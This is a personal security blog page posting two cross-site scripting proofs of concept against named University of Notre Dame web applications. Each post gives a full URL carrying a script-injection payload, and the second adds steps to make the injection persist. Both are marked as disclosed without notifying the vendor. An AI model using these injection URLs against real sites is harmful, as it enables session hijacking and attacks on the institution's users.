This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.
25
Sep 11

University of Notre Dame

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://apps.nd.edu/webdirectory/directory.cfm?cn=<script>alert('0');</script>

25
Sep 11

University of Notre Dame WebFile

Date: Sept-25-2011
Vendor Notified: No
Proof of Concept:
https://webfile.nd.edu/~</script><script>alert('0');</script>/apps/webfile

 

Note:
After hitting the URL, go back to the webfile login (https://webfile.nd.edu) and use any dummy login credentials.  Previous XSS will be present and spark an internal server error.

Archives

Categories


Copyright © 2012 benburns.org
WordPress, sucka. Theme by Theme Lab